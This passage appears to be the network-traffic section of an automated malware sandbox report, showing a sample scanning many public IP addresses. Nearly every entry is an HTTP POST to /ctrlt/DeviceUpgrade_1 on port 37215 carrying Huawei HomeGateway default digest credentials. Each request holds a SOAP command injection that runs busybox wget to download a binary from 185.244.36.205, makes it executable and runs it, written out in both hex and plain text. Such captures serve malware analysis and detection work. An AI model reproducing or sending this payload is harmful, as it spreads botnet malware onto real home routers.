                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              250192.168.2.1537008190.202.64.6137215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:11.205705881 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              251192.168.2.1557278121.61.62.24437215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:11.205766916 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              252192.168.2.153457694.106.212.15237215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:11.205768108 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              253192.168.2.1545004122.160.139.22437215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:11.205777884 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              254192.168.2.1541264157.212.72.24337215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:11.205833912 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              255192.168.2.1548480156.112.251.1937215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:11.205835104 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              256192.168.2.153521245.137.32.10037215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:11.205835104 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              257192.168.2.1539086199.129.21.3537215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:11.205849886 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              258192.168.2.1547742222.51.122.20137215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:11.205852032 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              259192.168.2.153857894.164.144.11337215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:11.205898046 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              260192.168.2.1540420190.85.145.237215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:11.205898046 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
